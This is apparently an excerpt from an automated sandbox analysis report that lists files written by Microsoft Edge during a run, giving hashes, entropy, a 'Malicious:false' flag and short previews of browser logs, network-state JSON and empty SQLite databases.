                                                                                                                                                                                                                                                                        SSDEEP:12:yLv4Yeb8rcHEZrELFUt8hD/+hZ5LYeb8rcHEZrEZSJ:a4Yeb8nZrExg88LYeb8nZrEZe
                                                                                                                                                                                                                                                                        MD5:45739BDFFFC5D1525207B597DCA2285C
                                                                                                                                                                                                                                                                        SHA1:0B4EEFE888A3A9CD58C24F34024237CA8197D59D
                                                                                                                                                                                                                                                                        SHA-256:B6F3B5C00386C384F47F1380D22DB6018F143D41A4D84A820F4C33652A0F5782
                                                                                                                                                                                                                                                                        SHA-512:A70FA0FC5E2AD633704E7DD3A3E7B5817AA2184802ED66F34FAB020BCD675A9EB5739BE056CD4B18949BE3D9017DAA969C9FD7EAC8EF584CBE136665AF5155F1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:35.842 2e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-02:20:35.843 2e8 Recovering log #3.2024/12/27-02:20:35.843 2e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):405
                                                                                                                                                                                                                                                                        Entropy (8bit):5.240148151407293
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:yLv4Yeb8rcHEZrELFUt8hD/+hZ5LYeb8rcHEZrEZSJ:a4Yeb8nZrExg88LYeb8nZrEZe
                                                                                                                                                                                                                                                                        MD5:45739BDFFFC5D1525207B597DCA2285C
                                                                                                                                                                                                                                                                        SHA1:0B4EEFE888A3A9CD58C24F34024237CA8197D59D
                                                                                                                                                                                                                                                                        SHA-256:B6F3B5C00386C384F47F1380D22DB6018F143D41A4D84A820F4C33652A0F5782
                                                                                                                                                                                                                                                                        SHA-512:A70FA0FC5E2AD633704E7DD3A3E7B5817AA2184802ED66F34FAB020BCD675A9EB5739BE056CD4B18949BE3D9017DAA969C9FD7EAC8EF584CBE136665AF5155F1
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:35.842 2e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-02:20:35.843 2e8 Recovering log #3.2024/12/27-02:20:35.843 2e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1658
                                                                                                                                                                                                                                                                        Entropy (8bit):5.654593284274414
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:+tZfBWrPM/bXZ7pV03Sx4Lyls5aQnyhw7AHHk2GJ341:+tfKk/D9p2osOdP1
                                                                                                                                                                                                                                                                        MD5:204B60D5DE4296398AF82D714B43FF78
                                                                                                                                                                                                                                                                        SHA1:96717EA3AC490AED30A8CF78A81393AA1810C5C8
                                                                                                                                                                                                                                                                        SHA-256:ED8C4736857FA9EDCF5F2CBC5322276E7A54F591EBBBD2B306B6146AB5FBB9DF
                                                                                                                                                                                                                                                                        SHA-512:AE39454C6A23F5F319D8FD78ECAC0484DDEAB622BF5F462DE2844EAEFA9F91D792123B8CBC0C0393AF51235B07AED1F7A06291C6BF0215B70ECC0E8591DBFEDB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.6.7................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":815}.!_https://ntp.msn.com..LastKnownPV..1735284048715.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735284049847.._https://ntp.msn.com..MUID!.2BA4C89BEAD6644B32BDDDF9EBCF652E.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735284048841,"schedule":[33,-1,-1,30,-1,4,-1],"scheduleFixed":[33,-1,-1,30,-1,4,-1],"simpleSchedule":[34,27,39,22,24,31,15]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735284048666.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1036910875788255
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+d+q2P923oH+Tcwt8a2jMGIFUt8PF+yXZmw+PF+XVkwO923oH+Tcwt8a2jMmLJ:9+v4Yeb8EFUt81X/+4V5LYeb8bJ
                                                                                                                                                                                                                                                                        MD5:B58E165684B0130C53B98C0489268BF8
                                                                                                                                                                                                                                                                        SHA1:2D88F24CFE90BFE843AF0DFEBFE0AB5D732A1151
                                                                                                                                                                                                                                                                        SHA-256:904542D6908854867C442D6304EC1FC17A8E787989205AC0C46C5E1F1FCEEE2E
                                                                                                                                                                                                                                                                        SHA-512:9715C6A573AA4349F1B178BCB0051B6AE849FE60A2EC59CC81069C3120B2C1D7ED3377CF62B638CB6AF8C70457AF2DCBBD78A83F62E32CF977903D18121A0258
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.096 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-02:20:32.097 1cbc Recovering log #3.2024/12/27-02:20:32.111 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):336
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1036910875788255
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:cF+d+q2P923oH+Tcwt8a2jMGIFUt8PF+yXZmw+PF+XVkwO923oH+Tcwt8a2jMmLJ:9+v4Yeb8EFUt81X/+4V5LYeb8bJ
                                                                                                                                                                                                                                                                        MD5:B58E165684B0130C53B98C0489268BF8
                                                                                                                                                                                                                                                                        SHA1:2D88F24CFE90BFE843AF0DFEBFE0AB5D732A1151
                                                                                                                                                                                                                                                                        SHA-256:904542D6908854867C442D6304EC1FC17A8E787989205AC0C46C5E1F1FCEEE2E
                                                                                                                                                                                                                                                                        SHA-512:9715C6A573AA4349F1B178BCB0051B6AE849FE60A2EC59CC81069C3120B2C1D7ED3377CF62B638CB6AF8C70457AF2DCBBD78A83F62E32CF977903D18121A0258
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:2024/12/27-02:20:32.096 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-02:20:32.097 1cbc Recovering log #3.2024/12/27-02:20:32.111 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\153ff7bc-0b41-4bbb-9ddf-e01b908f39af.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6af7d95f-d76a-45be-917e-a577a06ee000.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):1664
                                                                                                                                                                                                                                                                        Entropy (8bit):5.3239182277647386
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:YcgCzsVts9fcKsSleeBkBRseCgHdUbx9+:FSKtkeBkBBTdUV9+
                                                                                                                                                                                                                                                                        MD5:1C84F33F3E9293E40171A7373178EC43
                                                                                                                                                                                                                                                                        SHA1:88C2EA7D77BBA31DC65A58A63940E384ED123C81
                                                                                                                                                                                                                                                                        SHA-256:5753A18E97871672AD156BA305D415D801D45512EBAEBCBDFC8BB012DA3FE01F
                                                                                                                                                                                                                                                                        SHA-512:89389EA96DC6E33681B9609AE502AD67B3B6AB5C2F7B216BA54D9B879B8EC381946CBEC150D9B62007B58E31BB68681755865557E9387CAEF8F0176A135934DC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13382349636625147","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13382349639585172","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379851242445459","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\99f0daf4-8524-4232-a606-2f72ac1c923e.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                        Entropy (8bit):2.7807628369682758
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:tTseErm45eLANxCJ/riA0knw9WMKSXcf0L/ZJVb:Vseh45eL+CJ/riAVAhXI0LhJVb
                                                                                                                                                                                                                                                                        MD5:9BF600D290F3DD0EEC9C9D9B769BCD4E
                                                                                                                                                                                                                                                                        SHA1:2700E2E34FDC4440C41A47B51649E0136A409E24
                                                                                                                                                                                                                                                                        SHA-256:06868B0C8BA94772DB4E70020B8D64B769533B8EF28AB3B8EA6696F57CEAFF16
                                                                                                                                                                                                                                                                        SHA-512:52C6AE0077B6CA3F96D436DE1F00C72B3434FDC3B1BD5EC64D8FAD495164461EE8A4908A219C56B70133FC17C73DAA2DDEF981FF95FBC9FA92E19ACEEC58BEFD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1419
                                                                                                                                                                                                                                                                        Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                        MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                        SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                        SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                        SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4cbb8.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1419
                                                                                                                                                                                                                                                                        Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                        MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                        SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                        SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                        SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                        Entropy (8bit):1.2150990772824406
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9WB:uIEumQv8m1ccnvS6KqKnv
                                                                                                                                                                                                                                                                        MD5:FDCB5A120F6A64396E25331B5D5B0B04
                                                                                                                                                                                                                                                                        SHA1:C1625BF0E98F1B49E7EFCB7084E25A8DC6E59013
                                                                                                                                                                                                                                                                        SHA-256:B54CCF6C4F450987F7E0B62E5EC479FD7713D38BD350C73A64C78BF17DC5CEBB
                                                                                                                                                                                                                                                                        SHA-512:D731848E4BFA073CC0D32A86A3BE3A62BC6ADD453E7DCFC2842A17DA98A12609730A4DC18EE759EDF49595FBB0BE2422D144BF6DE0D6DFE17CE2E11E4ADBB72C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3bc8b.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3ceea.TMP (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a970722c-d981-4f5d-b1f3-99324efc5571.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f3e412d6-8d42-4eb4-a85a-58e74a7b2a0f.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
